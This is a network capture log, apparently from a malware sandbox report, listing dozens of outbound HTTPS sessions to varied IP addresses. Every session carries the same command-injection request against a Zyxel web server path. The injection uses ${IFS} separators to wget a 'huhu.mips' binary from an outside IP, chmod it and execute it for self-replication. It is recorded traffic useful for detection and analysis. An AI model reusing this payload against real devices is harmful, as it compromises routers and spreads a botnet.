                                                        Feb 2, 2024 06:21:17.073815107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6275192.168.2.145917291.225.18.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073847055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6276192.168.2.145909423.215.205.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073899031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6277192.168.2.1459762207.87.238.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073910952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6278192.168.2.1452314175.195.120.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073946953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6279192.168.2.1438134180.36.125.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.073997021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6280192.168.2.144301460.240.56.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074032068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6281192.168.2.1434496106.7.16.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074074984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6282192.168.2.144818498.55.213.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074124098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6283192.168.2.1438634170.30.183.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074150085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6284192.168.2.1438740122.184.104.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074198008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6285192.168.2.1446102205.80.128.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074239016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6286192.168.2.1459972103.29.172.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074280977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6287192.168.2.145788895.213.180.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.074322939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6288192.168.2.1439712151.86.78.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078020096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6289192.168.2.145498823.75.233.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078056097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6290192.168.2.1459450162.46.158.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078089952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6291192.168.2.143783434.222.153.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078139067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6292192.168.2.1449936125.242.115.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078183889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6293192.168.2.1435164132.176.158.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078236103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6294192.168.2.1459684155.110.34.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078249931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6295192.168.2.1442070112.49.119.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078294992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6296192.168.2.1451290166.55.74.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078361988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6297192.168.2.1447420109.12.76.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078387976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6298192.168.2.1448160143.238.130.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078413010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6299192.168.2.145400027.226.14.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078449011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6300192.168.2.145613086.180.12.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078486919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6301192.168.2.1443152161.78.163.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078552008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6302192.168.2.143628687.81.116.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078596115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6303192.168.2.143705079.141.245.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078630924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6304192.168.2.14609449.4.71.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078666925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6305192.168.2.144178813.22.139.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078715086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6306192.168.2.1450132202.28.87.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078752995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6307192.168.2.1438224166.107.78.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.078810930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6308192.168.2.1457818202.146.39.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088227987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6309192.168.2.144344674.31.146.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088264942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6310192.168.2.144824888.159.127.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088289022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6311192.168.2.1459888202.102.217.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088354111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6312192.168.2.144268277.16.84.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088385105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6313192.168.2.1445482203.94.140.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088408947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6314192.168.2.146086457.191.84.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088438034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6315192.168.2.1437374178.254.12.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088465929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6316192.168.2.144309619.210.76.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088501930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6317192.168.2.1454152162.84.76.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088541985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6318192.168.2.1435188134.226.203.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088587999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6319192.168.2.143421453.192.64.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088638067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6320192.168.2.145309286.7.224.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088670015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6321192.168.2.1448200143.75.242.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088711023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6322192.168.2.1460466131.157.97.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088751078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6323192.168.2.146015842.218.41.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088777065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6324192.168.2.1452476134.79.24.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088826895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6325192.168.2.1435074194.213.105.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088854074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6326192.168.2.1433874207.27.234.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088882923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6327192.168.2.144954251.158.217.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088924885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6328192.168.2.143655224.192.90.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.088992119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6329192.168.2.1434456171.131.244.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089021921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6330192.168.2.144522635.149.254.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089071035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6331192.168.2.1455680111.3.48.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089092970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6332192.168.2.1439050111.121.29.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089143038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6333192.168.2.1441350100.182.21.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089169025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6334192.168.2.1446146142.36.6.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089215994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6335192.168.2.1460528192.231.229.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089241982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6336192.168.2.1454128182.14.26.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.089279890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6337192.168.2.1440920170.137.55.111443
                                                        TimestampBytes transferredDirectionData
